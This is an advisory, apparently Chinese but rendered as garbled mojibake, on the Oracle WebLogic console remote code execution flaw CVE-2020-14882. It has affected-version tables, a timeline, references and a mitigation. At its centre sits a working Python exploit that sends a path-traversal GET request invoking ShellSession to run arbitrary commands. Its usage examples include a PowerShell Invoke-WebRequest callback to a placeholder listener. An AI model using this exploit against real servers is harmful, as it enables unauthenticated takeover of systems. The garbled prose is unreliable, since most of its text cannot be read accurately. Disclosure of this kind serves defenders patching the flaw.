¡¾¸üС¿CVE-2020-14882 | WebLogicÔ¶³Ì´úÂëÖ´Ðзì϶¹«¸æ

°ä²¼¹¦·ò 2020-10-30

0x00 ·ì϶¸ÅÊö

CNVD   ID

CVE-2020-14882

ʱ      ¼ä

2020-10-30

Àà     ÐÍ

RCE

µÈ      ¼¶

¸ßΣ

Ô¶³ÌÀûÓÃ

ÊÇ

Ó°ÏìÁìÓò


 

WebLogic ServerÊÇÃÀ¹úOracle¹«Ë¾µÄÖØÒª²úÆ·Ö®Ò»£¬ÆäÖØÒªÓÃÓÚ¿ª·¢¡¢¼¯³É¡¢²¿ÊðºÍÖÎÀí´óÐÍÉ¢²¼Ê½WebÀûÓá¢ÍøÂçÀûÓúÍÊý¾Ý¿âÀûÓã¬ÊÇóÒ×Êг¡ÉÏÖØÒªµÄJava(J2EE)ÀûÓ÷þÎñÆ÷Èí¼þÖ®Ò»¡£

 

0x01 ·ì϶ÏêÇé

image.png

 

2020Äê10ÔÂ28ÈÕ£¬Oracle°ä²¼µÄ10Ô°²È«¸üÐÂÖеÄOracle WebLogic Server Ô¶³Ì´úÂëÖ´Ðзì϶£¨CVE-2020-14882£©POC±»¹«¿ª£¬Ô¶³Ì¹¥»÷ÕßÄܹ»Í¨¹ý·¢ËͶñÒâµÄHTTP GET ÒªÇ󡣳ɹ¦ÀûÓô˷ì϶µÄ¹¥»÷Õß¿ÉÔÚδ¾­Éí·ÝÑéÖ¤µÄÇé¿öϽÚÔì WebLogic Server Console £¬²¢Ö´ÐÐËÁÒâ´úÂë¡£

2020Äê10ÔÂ29ÈÕ, Oracle°ä²¼µÄ·ì϶²¹¶¡CVE-2020-14882´æÔÚ¿ÉÈƹýµÄ0day·ì϶¡£¼´ÔÚWeblogic²¹¶¡¸üÐÂʵÏֺ󣬹¥»÷ÕßÈÔ¿ÉÈƹýWebLogicºó¶ÜµÇ¼µÈÏ޶ȣ¬²¢½ÚÔìWeblogic·þÎñÆ÷¡£Ôì³ÉµÄ·çÏÕ΢·çÏÕ¼«´ó¡£·ì϶ÏêÇéÈçÏ£º

·ì϶±àºÅ

²úÆ·

×é¼þ

ÆÀ·Ö

Ó°ÏìÁìÓò

CVE-2020-14882

Oracle WebLogic Server

Console

9.8

10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0,   14.1.1.0.0

CVE-2020-14883

Oracle WebLogic Server

Console

7.2

10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0,   14.1.1.0.0

 

ÓйØEXPÈçÏ£º

 

#!/usr/bin/python3

 

# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request

# Exploit Author: Nguyen Jang

# CVE: CVE-2020-14882

# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html

# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html

 

# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

 

import requests

import sys

 

from urllib3.exceptions import InsecureRequestWarning

 

if len(sys.argv) != 3:

    print("[+] WebLogic Unauthenticated RCE via GET request")

    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")

    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")

    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")

    exit()

 

target = sys.argv[1]

command = sys.argv[2]

 

request = requests.session()

headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

 

print("[+] Sending GET Request ....")

 

GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)

 

print("[+] Done !!")

 

0x02 ´ëÖý¨Òé

һʱ´ëÊ©£º

ÓÉÓڸ÷ì϶µÄ²¹¶¡´æÔÚ±»ÈƹýµÄ·çÏÕ£¬½¨Òéһʱ¹Ø¹Øºó¶Ü/console/console.portal¶Ô±í½Ó¼û¡£


0x03 ²Î¿¼Á´½Ó

https://www.oracle.com/security-alerts/cpuoct2020.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882

https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html


0x04 ¹¦·òÏß

2020-10-20  Oracle°ä²¼°²È«²¼¸æ

2020-10-21  VSRC°ä²¼Ê®Ô²¹¶¡¸üа²È«¹«¸æ

2020-10-28  ·ì϶POC±»¹«¿ª

2020-10-29  ·ì϶²¹¶¡±»Â¶³ö´æÔÚÈƹý0day

2020-10-30  VSRC°ä²¼°²È«¹«¸æ

 

0x05 ¸½Â¼

 

CVSSÆÀ·Ö³ß¶È¹ÙÍø£ºhttp://www.first.org/cvss/

 

 

 

image.png